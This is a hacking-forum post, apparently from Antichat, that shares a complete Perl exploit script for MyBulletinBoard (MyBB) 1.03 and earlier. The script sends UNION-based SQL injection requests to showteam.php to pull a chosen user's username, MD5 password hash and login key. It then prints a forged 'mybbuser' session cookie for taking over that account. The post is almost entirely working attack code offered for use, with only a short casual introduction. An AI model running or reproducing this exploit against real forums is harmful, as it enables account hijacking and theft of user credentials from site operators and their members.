Форум АНТИЧАТ - MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit

Чё-то это неделя выдалась урожайная на SQL inj сплойты для форумов..... теперь под прицелом оказался MyBulletinBoard <= 1.03

Вот код сплойта
Код:
#!/bin/env perl

#//-------------------------------------------------------------#

#//     MyBB Forum SQL Injection Exploit .. By HACKERS PAL      #

#//     Greets For Devil-00 - Abducter - Almaster - GaCkeR      #

#//   Special Greets For SG (SecurityGurus) Team And Members    #

#//                    http://WwW.SoQoR.NeT                     #

#//-------------------------------------------------------------#



use LWP::Simple;

print "\n#####################################################";

print "\n#        MyBB Forum Exploit By : HACKERS PAL        #";

print "\n#               Http://WwW.SoQoR.NeT                #";

if(!$ARGV[0] or !$ARGV[1]) {

print "\n# -- Usage:                                         #";

print "\n# -- perl $0 [Full-Path] [User ID]             #";

print "\n# -- Example:                                       #";

print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";

print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";

print "\n#####################################################";

   exit(0);

}

else

{

print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";

print "\n#####################################################";

       $web=$ARGV[0];

       $id=$ARGV[1];

$url = "showteam.php?GLOBALS[]=1&comma=/*";

           $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

$page =~ m/FROM (.*)users u WHERE/;

$prefix=$1;

if(!$1)

      {

$prefix="mybb_";

      }

$url =

"showteam.php?GLOBALS[]=1&comma=-

2)%20union%20select%20uid,username,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.

"users%20where%20uid=$id/*";

           $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";

print "\n[+] Table Prefix is : $prefix";

$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$url =

"showteam.php?GLOBALS[]=1&comma=-

2)%20union%20select%20uid,password,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.

"users%20where%20uid=$id/*";

           $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";

die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);

  print"\n[!] Watch out ... The Cookie Value is comming\n";

$url =

"showteam.php?GLOBALS[]=1&comma=-

2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.

"users%20where%20uid=$id/*";

           $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";

print "[-] Unable to retrieve Login Key\n" if(!$1);

}